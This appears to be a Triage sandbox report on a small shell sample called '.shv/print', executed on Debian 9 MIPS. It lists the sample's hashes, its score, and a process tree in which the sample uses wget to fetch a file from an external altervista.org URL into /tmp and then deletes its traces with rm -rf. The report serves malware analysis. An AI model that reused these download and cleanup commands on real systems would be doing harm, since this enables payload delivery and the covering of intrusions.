74ea697d8de0bd71b9e521af9c096242d2caaa6237a8bbae7997852c05347804 | Triage

Analysis

max time kernel
9s
max time network
12s
platform
debian-9_mips
resource
debian9-mipsbe-20231215-en
resource tags

arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22/12/2023, 04:15

Sharing

Report Analysis Logs

General

Target

.shv/print
Size

163B
MD5

b9f8821dff37b42df51094a7a2115017
SHA1

3e256b9fc1d82918b75bdf928303867d72775a54
SHA256

5c112f4d6465349be43580ea7e69bbec15698bbf9164bb77b53f8a0b92f01d73
SHA512

83d38899e05613e9aa0b2a9aeae7c703ca90196c715af287ecb661767631e25a59e91460d76ba4199b641e397d6808a703b5b1b444c6a07c2252632c600cc0d6

Score

3^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.shv/.tmp	wget

/tmp/.shv/print
/tmp/.shv/print
1⤵
PID:716
- /usr/bin/wget
  wget -O .tmp "http://daemontool.altervista.org/js/i.php?request=asdfgh"
  2⤵
  - Writes file to tmp directory
  PID:730
- /bin/rm
  rm -rf ".tmp*"
  2⤵
  PID:731
- /bin/rm
  rm -rf "*request*"
  2⤵
  PID:732

/bin/cat
cat t.log
1⤵
PID:724

/usr/bin/sort
sort
1⤵
PID:725

/usr/bin/uniq
uniq
1⤵
PID:726

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads